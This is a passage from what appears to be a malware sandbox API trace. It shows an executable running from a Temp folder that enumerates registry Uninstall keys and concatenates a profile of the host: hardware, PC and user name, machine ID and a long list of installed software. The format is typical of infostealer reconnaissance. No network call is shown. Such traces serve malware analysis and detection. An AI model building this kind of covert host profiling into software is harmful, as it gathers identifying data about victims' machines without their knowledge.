Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 " [0175.943] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001" [0175.943] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\n" [0175.943] RegCloseKey (hKey=0x354) returned 0x0 [0175.944] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x34, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.944] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}") returned 90 [0175.944] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.944] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpcbData=0x197fd4*=0x3f) returned 0x0 [0175.944] lstrlenA (lpString="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161") returned 62 [0175.944] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161" [0175.944] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="9.0.30729.6161", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.944] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 